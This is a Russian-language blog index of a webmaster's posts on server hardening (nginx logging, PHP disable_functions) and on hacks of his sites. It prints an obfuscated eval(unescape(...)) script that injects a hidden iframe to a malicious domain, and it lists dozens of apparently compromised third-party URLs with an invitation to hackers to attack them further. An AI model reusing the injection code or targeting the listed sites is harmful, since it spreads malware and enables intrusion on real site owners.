Защита nginx на сервере

Защита nginx на сервере многогранна.

Одна из граней, пока у нас не увели рута или юзера с правами рута, то логи nginx нужно обогатить:

if ($request_method ~ "^POST$") {
    access_log /var/log/nginx/access-POST-$server_name.log main_post;
}
if ($request_method ~ "^(PUT|OPTIONS|HEAD|PATCH|DELETE|TRACE|CONNECT)$") {
    access_log /var/log/nginx/access-PUT-$server_name.log main_post;
}

ну и:

log_format main_post '$remote_addr [$time_local] $host "$request" '
    '$status $body_bytes_sent [$request_body] "$http_referer" '
    '"$http_user_agent"';

ну и client_body_buffer_size в /etc/nginx/nginx.conf установить как вам нужно, чтобы ваши запросы помещались, а хакерские нет :)
или наоборот, ставьте побольше, чтобы любой хакерский запрос поймать.

и защитить:

chown nginx:nginx /var/log/nginx
chmod 200 /var/log/nginx

последнее особенно удивительно для меня, самоучки, но логи пишутся, а больше убирать там нечего :)

UPDATE уже ночью
логи то пишутся, но после рестарта nginx хочет прочитать старое, чтобы добавить новое и не может.
поэтому

chmod 600 /var/log/nginx

и наблюдаем дальше...

И да, Ceterum censeo Lugansk esse delendam! Прочитать полностью...

Защита PHP на сервере

По следам наших выступлений раз, два.

Я считаю обязательным  в файле /etc/php.ini установить disable_functions = длинный список функций под катом


Прочитать полностью...

Второй хакер на новом сервере results@hackermail.com

Второй хакер на новом сервере results@hackermail.com
Аваст называет его PHP:BackDoor-DJ [Trj]
Смог только залить псевдогифку в /tmp/ но уже не gzip, а просто PHP в виде гифки.
первый заливал сжатый PHP:Shell-HP [Trj]
И да, Ceterum censeo Lugansk esse delendam! Прочитать полностью...

Первые хакеры на новом сервере

Поздравь хакера с Новым 2015 годом по одному из адресов:

citiexplosion2013@gmail.com
sarna_p@yahoo.com
bebeshark@live.com

На новом сервере, я ещё не успел им похвастаться, залили псевдогифку в /tmp/

Вот под катом её PHP текст уже после расшифровки, текстовки на индонезийском языке

Апдейт 05/01/2014

Аваст спустя 10 дней от начала этого безобразия обновился :) и стал называть это "PHP:Shell-HP [Trj]" и блокировать, поэтому текст я убрал. Если кому-то нужно - вставлю картинкой.

Прочитать полностью...

Снова хакеры. На этот раз взрослые.

15 часов назад у меня сломали сервер, залили шел и начали что-то там в инете сканировать. Загрузили процессор на 100% без передышки - чем и привлекли моё внимание и админов хостера.

Проверяйте свои логи на предмет вот такого:

111.222.333.444 - - [27/Aug/2010:12:12:12 +0300] "GET /myadmin/scripts/setup.php HTTP/1.0" 200 14058 "http://111.222.333.444/myadmin/scripts/setup.php" "Opera"

и удаляйте или обновляйте setup.php от ПХПмайАдмина.

Я про это читал месяц назад, но "авось" не пронесло :)

Спасибо за внимание. Прочитать полностью...

Хакеры 2

Несколько дней назад хакеры взломали один из моих медицинских блогов (WP 2.7.1 сам виноват, не обновлялся) и залили в хэдер ява-скрипт. Антивирус Аваст на него ругается - всё нормально. Текст скрипта с эксплойтом залить на блогспот очень проблематично, поэтому исходник можно посмотреть тут:

http://livepad.ru/view/6454c638

После расшифровки там нашлось http://itsallbreaksoft.net/tds/in.cgi?.......

Смотрим

itsallbreaksoft.net

Creation date: 26 Jan 2010
Registrant Contact:
Nexton Limited
Ryabov Sergey ()
+79219270961
Fax: +79219270961
Scherbakova st., 6-38
Saint-Petersburg, 197375
RU

http://www.sigurdblog.com/ruler-domains/
"...Мы не продаем домены под кодеки, софт и прочую малвару..."

Почему гугл забанил все домены этого регистратора http://www.gofuckbiz.com/showthread.php?t=14179 (27.01.2010, 12:50)? Почему гугл так медленно пускает их обратно в индекс?

Загадка :(

Ну и на последок нужно отписаться от кого-то. Сегодня это

http://brutalblog.ru/ Блог хороший, интересный, но мне там читать нечего.
Прочитать полностью...

Взломщики

Хакеры взломали один мой блог и напичкали линками. Я завел специальный блог для публикации подробностей про этих педиков оптимизаторов нетрадиционной ориентации.
Стремный текст теперь будет там.



Прочитать полностью...

Сайт Московского Полубомжа содержит вредоносное ПО

Захожу на его сайт и вижу такое:



Вот вопрос - это плагин WP-ban так работает ИЛИ хакеры подложили ИЛИ МПБ так со спамерами борется?

Под катом содержится дезактивированный и расшифрованный текст самого айфрейма и его исходник:


(iframe src="http://orentraff.cn/in.cgi?13" style="visibility: hidden; display: none")(/iframe)

Кто сомневается, вот исходник страницы:

Requesting http://www.mpbseo.ru/ .. Ok
Reply received (reply time: 765 ms)
-----------------------------------
HTTP/1.1 200 OK
Date: Sat, 16 Aug 2008 20:22:13 GMT
Content-Type: text/html
Connection: close
Server: Apache
Content-Length: 2714

...тут текст страницы...

(/html)(script type="text/javascript")
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5C%75%30%30%33%63%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%32%5C%75%30%30%36%33%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%37%34%5C%75%30%30%37%30%5C%75%30%30%33%61%5C%75%30%30%32%66%5C%75%30%30%32%66%5C%75%30%30%36%66%5C%75%30%30%37%32%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%37%34%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%36%5C%75%30%30%36%36%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%65%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%65%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%37%5C%75%30%30%36%39%5C%75%30%30%33%66%5C%75%30%30%33%31%5C%75%30%30%33%33%5C%75%30%30%32%32%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%34%5C%75%30%30%37%39%5C%75%30%30%36%63%5C%75%30%30%36%35%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%37%36%5C%75%30%30%36%39%5C%75%30%30%37%33%5C%75%30%30%36%39%5C%75%30%30%36%32%5C%75%30%30%36%39%5C%75%30%30%36%63%5C%75%30%30%36%39%5C%75%30%30%37%34%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%30%30%32%30%5C%75%30%30%36%38%5C%75%30%30%36%39%5C%75%30%30%36%34%5C%75%30%30%36%34%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%33%62%5C%75%30%30%32%30%5C%75%30%30%36%34%5C%75%30%30%36%39%5C%75%30%30%37%33%5C%75%30%30%37%30%5C%75%30%30%36%63%5C%75%30%30%36%31%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%30%30%32%30%5C%75%30%30%36%65%5C%75%30%30%36%66%5C%75%30%30%36%65%5C%75%30%30%36%35%5C%75%30%30%32%32%5C%75%30%30%33%65%5C%75%30%30%33%63%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%33%65%27%29%3B"));
(/script)


Прочитать полностью...

Выкладываю список криворуких админов за июнь 2008.

С этих хостов в июне пытались ломать мои джобаксовые-маркетхэлсовые (с реф) аптеки. Предыдущий список за май.

Хакеры могут идти доламывать, если там есть что ещё сломать.

Если вы уверены, что ваш сайт не дырявый - пишите в комментах, уберу из списка.
Итак, продожаем список жертв < ?php echo md5("just_a_test");? > (пробелы до и после угловых скобок убрать):

http://www.jyvaskylankirjastot.fi/yhteistyo/wd/muji/renula/xejad
http://www.qualitas1988.com/images/editor/.thumbs/sowem/mudi/
http://www.polarflug.de/sources/sinokof/copaxan/
http://www.oriolmanya.net/nautilus/phpBB2/language/lang_english/
http://www.blankner.ocps.net/media/yeloc/repaw/
http://www.totkom.com/sklep/admin/includes/classes/cohiru/neyuza
http://www.elettrodataservice.it/foto_articoli/pivafof/mibi/
http://www.interkonet.com/galeria/modules/albumselect/ucu/yixipu
http://www.landi-sempach-emmen.ch/aktionen/image/zafecez/roxovef
Прочитать полностью...

Криворукие админы. Бегом сюда, тут про вас написано.

Кто не заховался - я не виноват.
Выкладываю список дырявых сайтов, с которых бомбят мои аптеки.
Если вы уверены, что ваш сайт не дырявый - пишите в комментах, уберу из списка.
Итак, список славы имени < ?php echo md5("just_a_test");? > (пробелы до и после угловых скобок убрать):


23/05/2008 пятница

http://www.psikolojikyardim.org/etkinlik/include/eto/nixaz/
http://www.obrasmecanicasch.com/omch/img/anawuho/ledego/
http://www.marsbook.co.kr/main/created/product/2/mumas/ohalupa/
http://www.pattibus.it/phplib-7.2b/pages/ilosi/dohigal/
http://www.tureksfuar.com.tr/joomla/mambots/content/ugi/vipo/
http://sans-packing.ru/img/jipeqap/ehudute/
http://www.felixtorresycia.com/admin/correo/enaq/ecib/
http://www.municipioxii.it/sunnyway/igodoq/bukosud/
http://sahel55.com/articles/omaduro/kimumid/
http://www.municipioxii.it/sunnyway/eheqebi/jahibop/
http://sites.redskycreative.com/canyonlakechurch/jolalu/buq/
http://www.service-exposants.com/store/iyi/jab/
http://www.zlotow.biz/radiomariana2/rawi/ayutuqi/
http://www.obrasmecanicasch.com/omch/img/itofu/viroja/
http://mojazubarka.sk/test/admin/sicaqe/socoqar/
http://www.unduetretoccaate.it/codice/aseje/wocobo/
http://www.altaiseer-eg.com/ar/articles/jed/umut/
http://www.electrofed.com/_app/efc/odoqu/ferus/
http://sinzinuri.com/imsi/db/pic/huv/abey/
http://honamfishing.co.kr/phpmysqladmin/libraries/oduzov/neloze/
http://www.asigurareamea.ro/upload_fisiere/ibanar/suxokud/
http://lnx.sarapica.net/art/kepex/ipoj/
http://www.fabcraft.co.uk/forum/lovuqo/zil/
http://honamfishing.co.kr/phpmysqladmin/libraries/nov/wulosu/
http://www.ce-cioceoforum.com/talk/t1/roda/ilubov/
http://www.asais.info/newsletter/includes/lohu/vomi/
http://www.cjp.spb.ru/en/tis/leboma/
http://www.spoddyland.co.uk/scans/youneedtoselectaplanettoclaimb
http://www.thoseguysfilms.com/forums/templates/subSilver/images/
http://www.polisgrandhotel.gr/_cm_admin/maillist/editor/plugins/
http://lnx.sarapica.net/art/ufo/uco/
http://www.interkonet.com/enxicmarxant/web/editor/scripts/icons/
http://www.slda.info/images/edunuha/ade/
http://www.thoseguysfilms.com/forums/templates/subSilver/images/
http://www.meexia.com/blog/wp-content/themes/squares/orelura/wag
http://www.marsbook.co.kr/main/created/product/2/upu/ohoqoh/
http://www.soeasywebsite.com/soeasycasino/enosucu/ijani/
http://sinzinuri.com/imsi/db/pic/bezefi/ugoye/
http://www.vlopezalvarez.com/Personal/Fotos/Viajes/xaj/yit/
http://www.syntasoft.com/forum/Themes/rowizah/nisahuc/
http://www.northfans.ch/forum/admin/settings/gucor/ujusu/
http://www.northfans.ch/forum/admin/settings/ocoyo/azad/
http://www.heaven-house.kz/templates_c/sexes/afacub/
http://cyberoute.com/demo/docs/images/gurod/ahah/
http://www.felixtorresycia.com/admin/correo/enaq/zonod/
http://www.elettrodataservice.it/foto_articoli/pivafof/oqonon/
http://www.foicr.org/work/mulito/vom/
http://www.tureksfuar.com.tr/joomla/mambots/content/cobojax/udak
http://www.centralbalkannationalpark.org/de/jage/cevoyi/
http://www.eloge-du-bien-commun.be/blog/bundled-libs/Net/ocoqen/
http://www.stomol.ru/catalog/afa/azo/
http://www.thoseguysfilms.com/forums/templates/subSilver/images/
http://www.nedkellypub.it/concerti/dati/hoca/etoyen/
http://www.cjp.spb.ru/en/aki/ucuyupi/
http://www.vacacionalhouse.com/en/img/vohe/seyon/
http://www.soeasywebsite.com/soeasycasino/ixu/xotem/
http://www.planet-pictures.de/content_system/sehenab/jajox/
http://www.thoseguysfilms.com/forums/templates/subSilver/images/
http://www.channelnewsperu.com/imagenes/publicaciones/fotos/nepi
http://www.elettrodataservice.it/foto_articoli/onoda/iyegimi/
http://www.winbd.net/admin/jist_code/wowoz/opaxi/
http://www.spoddyland.co.uk/scans/youneedtoselectaplanettoclaimb
http://www.asigurareamea.ro/upload_fisiere/agihixu/bezodan/
http://www.germania-neureut.de/files/statistik/oto/ajisiwe/
http://www.feliciano.de/Webgalerie/bilder/Italy/une/yiwul/
http://www.lamarguerite.ca/Pat/images/awixeta/veb/
http://www.oriolmanya.net/nautilus/phpBB2/language/lang_english/
http://www.thoseguysfilms.com/forums/templates/subSilver/images/
http://www.thoseguysfilms.com/forums/templates/subSilver/images/
http://www.filter-international.com/webservice/aro/medavuw/

Прочитать полностью...